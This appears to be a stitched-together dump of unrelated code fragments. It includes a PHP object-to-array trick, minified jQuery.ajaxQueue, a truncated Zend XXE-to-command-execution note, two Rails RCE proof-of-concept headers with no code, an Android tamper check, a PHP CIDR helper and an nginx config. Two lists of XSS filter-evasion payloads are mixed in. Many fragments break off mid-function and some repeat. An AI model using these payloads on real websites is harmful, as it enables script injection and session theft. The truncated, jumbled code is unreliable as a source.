<?php
/*
This function saved my life.
found on: http://www.sitepoint.com/forums//showthread.php?t=438748
by: crvandyke
It takes an object, and when all else if/else/recursive functions fail to convert the object into an associative array, this one goes for the kill. Who would'a thunk it?!
*/
$array = json_decode(json_encode($object), true);
/*
 * jQuery.ajaxQueue - A queue for ajax requests
 *
 * (c) 2011 Corey Frang
 * Dual licensed under the MIT and GPL licenses.
 *
 * Requires jQuery 1.5+
 */
(function(a){var b=a({});a.ajaxQueue=function(c){function g(b){d=a.ajax(c).done(e.resolve).fail(e.reject).then(b,b)}var d,e=a.Deferred(),f=e.promise();b.queue(g),f.abort=function(h){if(d)return d.abort(h);var i=b.queue(),j=a.inArray(g,i);j>-1&&i.splice(j,1),e.rejectWith(c.context||c,[f,h,""]);return f};return f}})(jQuery)
This turns https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt
into a Remote Command Execution:
NOTE: It relies on the PHP expect module being loaded
(see http://de.php.net/manual/en/book.expect.php)
joern@vbox-1:/tmp$ cat /var/www/server.php
<?
require_once("/usr/share/php/libzend-framework-php/Zend/Loader/Autoloader.php");
Zend_Loader_Autoloader::getInstance();
#!/usr/bin/env ruby
#
# Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0156)
#
# ## Advisory
#
# https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion
#
# ## Caveats
#
#!/usr/bin/env ruby
#
# Proof-of-Concept exploit for Rails Remote Code Execution (CVE-2013-0333)
#
# ## Advisory
#
# https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/1h2DR63ViGo
#
# ## Caveats
#
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
import android.content.Context;
import android.content.pm.PackageInfo;
import android.content.pm.PackageManager;
import android.content.pm.PackageManager.NameNotFoundException;
import android.content.pm.Signature;
public class TamperCheck {
    // we store the hash of the signature for a little more protection
    private static final String APP_SIGNATURE = "1038C0E34658923C4192E61B16846";
<?php
function getIPRangeByCIDR($cidr) {
    // Making sure IPs are valid
    $ipdata = explode('/', ltrim($cidr, '0'));
    $dotcount = substr_count($ipdata[0], '.');
    if ($dotcount != 3) {
        $ipdata[0] .= str_repeat('.0', (3-$dotcount));
    }
    $cidr_address = sprintf('%s/%s', $ipdata[0], $ipdata[1]);
# This configuration file is provided on an "as is" basis,
# with no warranties or representations, and any use of it
# is at the user's own risk.
user www-data;
worker_processes 4;
pid /run/nginx.pid;
events {
    worker_connections 768;
<div style="color:rgb(''�x:expression(alert(1))"></div>
<img/src=%00 id=confirm(1) onerror=eval(id)
<div id=confirm(1) onmouseover=eval(id)>X</div>
<span/onmouseover=confirm(1)>X</span>
<svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(88)&chr(83)&chr(83)))